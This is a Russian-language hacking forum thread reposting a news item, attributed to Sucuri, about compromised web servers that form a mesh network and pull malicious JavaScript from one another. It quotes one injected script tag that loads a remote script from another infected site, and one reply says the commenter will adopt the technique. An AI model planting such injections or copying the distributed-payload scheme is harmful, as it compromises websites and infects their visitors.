Всё что надо для Хакера

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Всё что надо для Хакера » Новости в мире Хакинга » Хакеры начали использовать технологию ячеистой сети.


Хакеры начали использовать технологию ячеистой сети.

Сообщений 1 страница 3 из 3

1

По данным компании Securi Security хакеры начали использовать технологию меш - ячеистой сети с самоорганизацией - для управления взломанными серверами. В частности, компания обнаружила подобную сеть, состоящую из более 800 серверов, заражённых вредоносным программным обеспечением. В такой сети сервера не включают собственные вредоносные JаvaScript-вредоносы, но содержат ссылки на других членов ячейки, где собственно и располагается вредоносный сценарий. В результате обнаружить вредонос тяжело, поскольку он работает только в связке с другими членами ячеистой сети.

Для пояснения принципов работы подобной системы эксперты компании приводит такой пример кода заражённого сайта:

"<sсript srс=”httx://tiande-rivne-com-ua.1gb. ua/hNtpSAXt.php ?id=56162149&quit; type=”text/jаvascript”></sсript>".

Такой, достаточно простой код, приводит к тому, что браузер жертвы скачивает вредоносный код самостоятельно с другого сайта, а владелец зараженного сервера даже и не подозревает о вредоносности сайта - в его-то хранилище вредоноса нет. При этом обнаружить управляющие сервера подобной ячеистой сети оказывается достаточно сложно, поскольку нужно анализировать не один сервер, а целую их сеть, что не всегда возможно владельцу отдельно взятого сервера. Пока компании не удалось выяснить как именно хакерам удаётся внедрить приведенный выше вредоносный контент.

• Source: blog.sucuri.net/2014/01/website-mesh-networks-distributing-malware.html

+5

2

Спасибо за статью. Весьма интересная идея фрагментировать скрипты и раскидать их по разным сервакам. Возьму на вооружение))) yurecwww как всегда респект!  :cool:

0

3

http://fantozer.forumbb.ru/uploads/000b/6d/d1/495-1.gif

0


Вы здесь » Всё что надо для Хакера » Новости в мире Хакинга » Хакеры начали использовать технологию ячеистой сети.